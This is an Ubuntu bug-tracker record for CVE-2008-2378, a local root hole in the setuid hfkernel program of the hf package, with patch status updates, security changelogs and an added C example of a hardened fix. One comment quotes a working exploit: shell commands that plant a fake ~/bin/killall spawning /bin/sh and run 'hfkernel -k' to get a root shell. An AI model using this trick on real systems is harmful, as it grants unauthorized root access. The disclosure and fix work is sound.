[CVE-2008-2378] - Untrusted search path vulnerability in hfkernel in hf 0.7.3 and 0.8 allows local users to gain privileges via a Trojan horse

Bug #320082 reported by Stefan Lesicnik
Affects        Status        Importance  Assigned to      Milestone
hf (Ubuntu)    Fix Released  High        Unassigned
  Dapper       Fix Released  High        Stefan Lesicnik
  Gutsy        Fix Released  High        Stefan Lesicnik
  Hardy        Fix Released  High        Stefan Lesicnik
  Intrepid     Fix Released  High        Stefan Lesicnik

Bug Description

Binary package hint: hf

Untrusted search path vulnerability in hfkernel in hf 0.7.3 and 0.8 allows local users to gain privileges via a Trojan horse killall program in a directory in the PATH, related to improper handling of the -k option.

Revision history for this message
Stefan Lesicnik (stefanlsd) wrote :

Will post test case later this evening.

Revision history for this message
Stefan Lesicnik (stefanlsd) wrote :

I can confirm this bug as tested in a chroot environment.

Below is an extract from the Debian bug, and it functioned the same here. It relies on ~/bin being in the $PATH, which is the default .profile behaviour if a ~/bin directory exists.

The hf package, described by Debian as an amateur-radio protocol suite
using a soundcard as a modem, is a program that eventually becomes
setuid(0), and has a trivial security hole in it.

By default the package installs "/usr/bin/hfkernel" as a typical binary,
but when first started via the program "hf" the binary is changed to
be setuid(root).

This is demonstrated:

skx@gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.

If you do start the program as root the permissions are changed:

skx@gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

Now the program is setuid:

skx@gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel

Creating ~/bin/killall is sufficient to gain root privileges.

skx@gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~/bin/killall
skx@gold:~$ chmod 755 ~/bin/killall
skx@gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)
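The root cause named in the description and in the changelogs below is a setuid-root program that spawns "killall" through the shell, so the lookup goes through the caller's $PATH. The following C is an added example written for this page, not code from the hf project or from the Debian patch. It shows the fix pattern a maintainer would apply (execve of a fixed absolute path with a fixed environment, never system()) together with a small audit helper that flags PATH layouts like the ~/bin-first one used in the test case above. The killall location /usr/bin/killall and the helper names are assumptions for illustration.

```c
/*
 * Added example (not hf project code): hardened replacement for the
 * pattern behind CVE-2008-2378, plus a PATH audit helper.
 *
 * Vulnerable pattern (not executed here):
 *     system("killall hfkernel");   // /bin/sh resolves "killall" via $PATH
 * In a setuid-root binary the first writable directory in PATH (e.g. ~/bin)
 * decides which "killall" runs as root. The safe version below never
 * consults PATH: it execve()s a fixed absolute path with a fixed environment.
 */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Audit helper: index of the first PATH entry an unprivileged user could
 * control (empty entry = current directory, relative entry, or a directory
 * under the user's home), or -1 if none. Pure string check, no stat(). */
int first_untrusted_path_entry(const char *path, const char *home)
{
    size_t homelen = home ? strlen(home) : 0;
    const char *p = path;
    int idx = 0;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return idx;                 /* "" or relative: resolves via cwd */
        if (homelen && len >= homelen && strncmp(p, home, homelen) == 0 &&
            (len == homelen || p[homelen] == '/'))
            return idx;                 /* lives under $HOME */
        if (!colon)
            return -1;
        p = colon + 1;
        idx++;
    }
}

/* Fixed environment for privileged helpers: the inherited PATH, IFS and
 * LD_* variables are simply not passed on. */
static char *const CLEAN_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Run an absolute path with the clean environment. Returns the child's
 * exit status, or -1 if the path is not absolute or the spawn failed. */
int spawn_fixed(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, CLEAN_ENV);
        _exit(127);                     /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hardened equivalent of the -k handling: the killall path is hard-coded
 * (assumed location; adjust for the distribution). */
int kill_hfkernel_safely(void)
{
    char *const argv[] = { "killall", "hfkernel", NULL };
    return spawn_fixed("/usr/bin/killall", argv);
}

/* Demonstration: the exit status of the child comes back unchanged. */
int demo_spawn_exit_status(void)
{
    char *const argv[] = { "sh", "-c", "exit 7", NULL };
    return spawn_fixed("/bin/sh", argv);
}

int main(void)
{
    /* Constructed PATH matching the test case above: ~/bin comes first. */
    int bad = first_untrusted_path_entry("/home/skx/bin:/usr/local/bin:/usr/bin", "/home/skx");
    printf("first untrusted PATH entry: %d\n", bad);          /* 0 */
    printf("spawn_fixed exit status: %d\n", demo_spawn_exit_status()); /* 7 */
    printf("relative path rejected: %d\n", spawn_fixed("sh", NULL));   /* -1 */
    return 0;
}
```

The audit helper is what a packager or sysadmin can run over a user's PATH to see whether an ordering like the one in the test case exists; the spawn helper is the shape of fix the changelog entries refer to when they replace the system() call.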

Revision history for this message
Stefan Lesicnik (stefanlsd) wrote :

Can whoever uploads this, please change the 1.1 to 0.1 in the version in the debdiffs. not sure what I was thinking...

Changed in hf:
status: New → In Progress
Revision history for this message
Kees Cook (kees) wrote :

Jaunty has this fixed. I've got the debdiffs edited and building in the security queue now. Thanks for the patches and the testing!

Changed in hf:
status: In Progress → Fix Released
importance: Undecided → Medium
status: New → Fix Committed
importance: Undecided → Medium
assignee: nobody → stefanlsd
status: New → Fix Committed
importance: Undecided → Medium
assignee: nobody → stefanlsd
status: New → Fix Committed
importance: Undecided → Medium
assignee: nobody → stefanlsd
status: New → Fix Committed
importance: Undecided → Medium
assignee: nobody → stefanlsd
importance: Medium → High
importance: Medium → High
importance: Medium → High
importance: Medium → High
importance: Medium → High
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package hf - 0.8-8ubuntu0.1

---------------
hf (0.8-8ubuntu0.1) intrepid-security; urgency=low

  * SECURITY UPDATE: Fix local root security hole that is caused by an
    insecure call to the system function, thanks Steve Kemp. (LP: #320082)
    - Patch from Debian applied inline.
    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
    - CVE-2008-2378

 -- Stefan Lesicnik <email address hidden> Thu, 22 Jan 2009 17:44:08 +0200

Changed in hf:
status: Fix Committed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package hf - 0.8-4ubuntu0.1

---------------
hf (0.8-4ubuntu0.1) gutsy-security; urgency=low

  * SECURITY UPDATE: Fix local root security hole that is caused by an
    insecure call to the system function, thanks Steve Kemp. (LP: #320082)
    - Patch from Debian applied inline.
    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
    - CVE-2008-2378

 -- Stefan Lesicnik <email address hidden> Thu, 22 Jan 2009 18:17:55 +0200

Changed in hf:
status: Fix Committed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package hf - 0.8-5ubuntu0.1

---------------
hf (0.8-5ubuntu0.1) hardy-security; urgency=low

  * SECURITY UPDATE: Fix local root security hole that is caused by an
    insecure call to the system function, thanks Steve Kemp. (LP: #320082)
    - Patch from Debian applied inline.
    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
    - CVE-2008-2378

 -- Stefan Lesicnik <email address hidden> Thu, 22 Jan 2009 17:50:08 +0200

Changed in hf:
status: Fix Committed → Fix Released
Revision history for this message
Kees Cook (kees) wrote :

hf (0.7.3-2ubuntu0.1) dapper-security; urgency=low

  * SECURITY UPDATE: Fix local root security hole that is caused by an
    insecure call to the system function, thanks Steve Kemp. (LP: #320082)
    - Patch from Debian applied inline. (Modified for 0.7.3)
    - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
    - CVE-2008-2378

 -- Stefan Lesicnik <email address hidden> Thu, 22 Jan 2009 18:13:36 +0200

Changed in hf (Ubuntu Dapper):
status: Fix Committed → Fix Released